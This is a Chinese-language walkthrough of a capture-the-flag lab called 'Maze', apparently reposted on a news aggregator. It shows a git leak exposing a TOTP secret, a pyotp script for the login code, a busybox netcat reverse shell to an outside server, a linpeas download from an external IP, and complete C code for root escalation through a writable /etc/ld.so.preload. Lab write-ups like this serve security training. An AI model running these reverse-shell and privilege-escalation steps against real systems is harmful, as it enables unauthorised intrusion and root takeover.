当前位置: 首页 > news >正文

【渗透测试】玄机Maze 全过程wp

news 2026/5/28 1:00:00

玄机&Maze

image-20260403150621470

也就是说开了80端口和22端口

image-20260403150926091

可以看到存在git泄露

使用git log -p命令审查提交历史。

image-20260403151230786

3XKWRL4MDQ5YYPZSYBPDGFLHFA

大概率是密钥,符合Base32编码格式

且从登录页面让我们填一个Google OTP

我们写一个脚本让他生成一个OTP

import pyotp
key = "3XKWRL4MDQ5YYPZSYBPDGFLHFA"
totp = pyotp.TOTP(key)
print("当前 OTP:", totp.now())  # 每30秒变一次

成功登录,得到shell

我们反弹shell到我们服务器上去

在服务器上
nc -lvnp 7777
在靶机上
busybox nc xx.xx.xx.xx 7777 -e /bin/sh

同时我们开TTY

python3 -c 'import pty; pty.spawn("/bin/bash")'

image-20260403152545097

提权

先上传一下linpeas.sh

kali
python3 -m http.server 6666
靶机
busybox wget http://115.120.236.65:6666/linpeas.shchmod +x linpeas.sh
./linpeas.sh

image-20260406164200889

用户对/etc/ld.so.preload文件拥有写入权限。该文件用于指定在任何程序运行前需要预加载的动态链接库。这是一个经典的、高成功率的linux提权向量

利用ld.so.preload提权

#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
#include <stdlib.h>void __attribute__((constructor)) init() {unlink("/etc/ld.so.preload");setgid(0);setuid(0);execl("/bin/bash", "bash", "--norc", "--noprofile", NULL);execl("/bin/sh", "sh", NULL);
}

在/tmp目录下创建一个名为exp.c的C语言文件,其功能是在库被加载时,将当前进程的权限提升为root,并启动一个bash shell

使用gcc将C代码编译成一个共享库文件exp.so
gcc -fPIC -shared -O -o exp.so exp.c -nostartfiles

将我们恶意共享库的路径写入/etc/ld.so.preload中

echo "/tmp/exp.so" > /etc/ld.so.preload

然后我们执行任何一个以root权限运行的SUID程序(如sudo)来出发预加载

sudo -l

image-20260406170056763

http://www.jsqmd.com/news/598001/

相关文章:

  • Win11 23H2任务栏Copilot图标消失?别慌,一个注册表文件+两步设置帮你永久找回
  • 告别锯齿!用TextMeshPro Sprite Asset实现完美像素字体的5个关键步骤
  • HunyuanVideo-Foley保姆级教程:Docker Compose编排WebUI+API+Redis缓存
  • HP Z440工作站BIOS配置优化:无需重启的服务器系统内修改指南
  • AI赋能开发:让快马平台智能处理9·1素材的标签与推荐
  • Win11Debloat:通过系统精简与优化实现Windows性能提升的自动化方案
  • LPDDR5 Bank架构深度解析:从Prefetch到Burst的效能密码
  • 小白也能懂:CYBER-VISION零号协议在智能导盲中的应用解析
  • 5分钟快速上手BepInEx:Unity游戏插件开发的终极解决方案
  • 轻资产创业指南:从0到月入10万的系统搭建与被动收入实现方法论
  • 数据结构之伸展树(Splay Tree)详解
  • 如何用三步法破解RPG Maker MV/MZ加密资源?技术实现与实战指南
  • 耐热抗损伤的高功率连续波激光组件让光学元件保持“冷”状态
  • CMOS迟滞比较器仿真陷阱:从瞬态延时到直流扫描的迟滞宽度真相
  • PX4软件在环仿真初体验:用jmavsim和QGC让无人机在电脑里先飞起来
  • Vue结合DataV实现动态滚动表格(dv-scroll-board)的样式与性能优化
  • 别再手动画码了!C#搭配ZXing.Net库,5分钟搞定商品标签一维码与会员卡二维码生成
  • 新手福音:在快马平台用ai生成你的第一个can协议通信demo
  • 新手福音,用快马平台零基础学习esp8266开发,从点灯到web控制
  • Kiro CLI + AI Skills 自动化运维排查实战 — 14 个 Skill 覆盖 AWS 全栈故障诊断
  • 一天一个开源项目(第66篇):awesome-design.md - 让 AI 助你打造像素级 UI 的设计规范
  • 分钟搞懂深度学习AI:实操篇:Attention
  • 洛雪音乐音源终极指南:一站式获取全网高品质音乐资源
  • HoRNDIS:Mac与Android USB网络共享终极指南
  • G-Helper:轻量级华硕笔记本性能优化与硬件控制工具全攻略
  • H5-Dooring终极指南:零代码可视化编辑器从入门到精通
  • Winhance中文版:让Windows系统性能提升30%的系统优化工具全攻略
  • Qwen3-ASR-1.7B部署教程:7861 API接口文档说明与curl/python调用示例
  • wxappUnpacker:小程序源码解析工具全指南
  • 快速构建交互式数据结构原型:用快马平台可视化二叉树操作